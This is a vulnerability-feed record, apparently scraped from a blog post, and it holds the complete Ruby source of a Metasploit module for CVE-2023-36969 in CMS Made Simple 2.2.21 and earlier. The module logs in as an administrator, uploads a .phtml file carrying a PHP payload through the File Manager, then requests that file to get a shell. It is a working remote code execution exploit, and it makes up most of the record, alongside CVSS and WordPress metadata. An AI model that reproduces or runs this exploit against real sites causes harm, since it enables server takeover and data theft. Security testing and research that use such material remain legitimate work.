{“lastseen”:”2025-08-29T19:22:55″,”description”:”CMS Made Simple \\u0026lt;= v2.2.21 allows an authenticated administrator to upload files with the .phar or .phtml extensions, enabling execution of PHP code …”,”published”:”2025-08-29T18:53:39″,”modified”:”2025-03-28T18:50:03″,”type”:”metasploit”,”title”:”CmsMadeSimple Authenticated File Manager RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-CMSMS_FILE_MANAGER_AUTH_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-36969″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::PhpEXE\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘CmsMadeSimple Authenticated File Manager RCE’,\\n ‘Description’ =\\u003e %q{\\n CMS Made Simple \\u003c= v2.2.21 allows an authenticated administrator to upload files\\n with the .phar or .phtml extensions, enabling execution of PHP code\\n leading to RCE. The file can be executed by accessing its URL in the\\n \/uploads\/ directory.\\n\\n Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Okan Kurtulu\u015f’,\\t# Initial research\\n ‘Mirabbas A\u011falarov’,\\t# EDB PoC\\n ‘tastyrice’\\t# Metasploit Module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2023-36969’],\\n [‘EDB’, ‘51600’]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Universal’, {}\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2023-06-07’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Base directory path for cmsms’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Username to authenticate with’, ”]),\\n OptString.new(‘PASSWORD’, [true, ‘Password to authenticate with’, ”])\\n ]\\n )\\n end\\n\\n def multipart_form_data(uri, data, message)\\n send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, uri),\\n ‘method’ =\\u003e ‘POST’,\\n ‘data’ =\\u003e data,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{message.bound}\\”,\\n ‘keep_cookies’ =\\u003e true\\n )\\n end\\n\\n def check\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ”, ‘index.php’),\\n ‘method’ =\\u003e ‘GET’\\n )\\n unless res \\u0026\\u0026 res.code == 200\\n vprint_error(‘Connection Failed’)\\n return CheckCode::Unknown\\n end\\n\\n set_cookie = res.get_cookies\\n return CheckCode::Safe unless set_cookie\\u0026.match?(\/^CMSSESSID\/)\\n\\n html = res.get_html_document\\n version = Rex::Version.new(html.at(‘p.copyright-info’).text.scan(\/\\\\d+\\\\.\\\\d+\\\\.\\\\d+\/).first)\\n vprint_status(\\”#{peer} – CMS Made Simple Version: #{version}\\”)\\n\\n return CheckCode::Appears if version \\u003c= Rex::Version.new(‘2.2.21’)\\n\\n CheckCode::Detected\\n end\\n\\n def login\\n data = {\\n ‘username’ =\\u003e datastore[‘USERNAME’],\\n ‘password’ =\\u003e datastore[‘PASSWORD’],\\n ‘loginsubmit’ =\\u003e ‘Submit’\\n }\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘admin’, ‘login.php’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘vars_post’ =\\u003e data,\\n ‘keep_cookies’ =\\u003e true\\n )\\n fail_with(Failure::NoAccess, ‘Authentication was unsuccessful’) unless res\\u0026.code == 302 \\u0026\\u0026 cookie_jar.cookies \\u0026\\u0026 res.headers[‘Location’] =~ %r{\/admin$}\\n\\n store_valid_credential(user: datastore[‘USERNAME’], private: datastore[‘PASSWORD’])\\n vprint_good(\\”#{peer} – Authentication was successful\\”)\\n end\\n\\n def send_file\\n filename = \\”#{rand_text_alpha(8..12)}.phtml\\”\\n c = cookie_jar.cookies.find { |cookie| cookie.name == ‘__c’ }.value\\n payload = get_write_exec_payload(unlink_self: true)\\n\\n # create the message with payload\\n message = Rex::MIME::Message.new\\n message.add_part(‘FileManager,m1_,upload,0’, nil, nil, ‘form-data; name=\\”mact\\”‘)\\n message.add_part(c, nil, nil, ‘form-data; name=\\”__c\\”‘)\\n message.add_part(‘1’, nil, nil, ‘form-data; name=\\”disable_buffer\\”‘)\\n message.add_part(payload, nil, nil, \\”form-data; name=\\\\\\”m1_files[]\\\\\\”; filename=\\\\\\”#{filename}\\\\\\”\\”)\\n data = message.to_s\\n\\n # send payload\\n payload_res = multipart_form_data(‘moduleinterface.php’, data, message)\\n fail_with(Failure::UnexpectedReply, ‘Failed to upload the file’) unless payload_res \\u0026\\u0026 payload_res.code == 200\\n vprint_good(\\”#{peer} – File uploaded #{filename}\\”)\\n\\n # open shell\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘uploads’, filename),\\n ‘method’ =\\u003e ‘GET’\\n )\\n return unless res \\u0026\\u0026 res.code == 404\\n\\n print_error(\\”Shell #{shell_name} not found\\”)\\n end\\n\\n def exploit\\n login\\n send_file\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/cmsms_file_manager_auth_rce.rb”,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/cmsms_file_manager_auth_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:22:55″,”description”:”CMS Made Simple \\u0026lt;= v2.2.21 allows an authenticated administrator to upload files with the .phar or .phtml extensions, enabling execution of PHP code …”,”published”:”2025-08-29T18:53:39″,”modified”:”2025-03-28T18:50:03″,”type”:”metasploit”,”title”:”CmsMadeSimple Authenticated…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-15132","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n